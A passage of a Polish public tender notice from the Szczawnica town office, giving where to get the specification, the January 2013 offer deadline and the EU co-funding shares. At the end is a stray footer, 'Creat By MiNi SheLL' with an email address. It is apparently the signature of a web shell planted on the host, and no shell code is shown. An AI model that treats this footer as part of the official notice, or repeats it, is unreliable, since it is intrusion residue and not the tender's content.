<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczawnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje w przedmiotowej sprawie można otrzymać wysyłając zamówienie pocztą na adres: Urząd Miasta i Gminy Szczawnica, ul. Szalaya 103, 34-460 Szczawnica..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2013 godzina 11:00, miejsce: Oferty należy składać za pośrednictwem poczty lub osobiście w siedzibie Zamawiającego w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane z następujących źródeł:
- współfinansowane przez Unię Europejską w ramach Programu Operacyjnego Innowacyjna Gospodarka na lata 2007 - 2013  - 85%, w tym 15% współfinansowanych ze środków krajowych
- wkład własny beneficjenta - 15%.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com